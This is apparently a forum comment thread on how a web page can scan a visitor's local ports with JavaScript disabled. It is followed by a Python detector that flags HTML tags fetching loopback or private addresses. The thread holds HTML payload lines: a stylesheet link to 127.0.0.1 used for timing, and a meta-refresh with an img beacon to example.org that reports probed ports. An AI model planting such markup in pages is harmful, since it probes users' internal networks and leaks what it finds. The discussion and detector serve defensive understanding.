by cygx 2223 days ago
NoScript isn't sufficient to protect you from this.

E.g., write a simple HTML file like

    <link rel="stylesheet" href="http://127.0.0.1:42">
    ok
If it takes different amounts of time for the page to stop loading and the text to appear depending on the port you checked, you're vulnerable to scans, even when JavaScript is disabled.
2 comments

If the page does not have JS running, how would it check the time elapsed? I'm not seeing the vulnerability with NoScript here.
Instead of merely printing 'ok', the page can request a resource from a server you control, e.g. via an <img> element.

You could probably even automate this via <meta http-equiv="refresh">, along the lines of (untested):

    <meta http-equiv="refresh" content="5; url=http://example.org/?query-port=43">
    <link rel="stylesheet" href="http://127.0.0.1:42">
    <img src="http://example.org/?checked-port=42">
uMatrix can protect against this if you block third party everything by default (which I do).
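
A filter-side check for the pattern discussed in this thread, added here as an example and not part of any comment or of uMatrix's code: it parses HTML without executing anything and reports tags whose URLs point at loopback, private or link-local addresses. The names `is_local_host`, `LocalFetchFinder` and `find_local_fetches` are hypothetical, and the sample input is constructed from the markup quoted above.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# URL-bearing attributes checked on every tag (href also covers plain links).
URL_ATTRS = {"href", "src", "poster", "data"}

def is_local_host(host):
    """True for localhost names and loopback/private/link-local IP literals."""
    host = (host or "").rstrip(".").lower()
    if host == "localhost" or host.endswith(".localhost"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # DNS name or unusual numeric form: not resolved here
    return ip.is_loopback or ip.is_private or ip.is_link_local

class LocalFetchFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (tag, url) in document order

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        urls = [v for k, v in attrs.items() if k in URL_ATTRS and v]
        # <meta http-equiv="refresh"> navigates with no script involved.
        if tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url\s*=\s*(.+)", attrs.get("content") or "", re.I)
            if m:
                urls.append(m.group(1).strip(" '\""))
        for url in urls:
            try:
                host = urlsplit(url).hostname
            except ValueError:
                continue  # malformed URL, e.g. unbalanced IPv6 brackets
            if is_local_host(host):
                self.findings.append((tag, url))

def find_local_fetches(html):
    finder = LocalFetchFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample: the markup quoted in the thread.
SAMPLE = """
<meta http-equiv="refresh" content="5; url=http://example.org/?query-port=43">
<link rel="stylesheet" href="http://127.0.0.1:42">
<img src="http://example.org/?checked-port=42">
"""

if __name__ == "__main__":
    for tag, url in find_local_fetches(SAMPLE):
        print(f"<{tag}> fetches local address: {url}")
```

The check only sees IP literals and `localhost` names; a DNS name that resolves to a local address, or an alternate numeric spelling of one, passes through and has to be caught at resolution time.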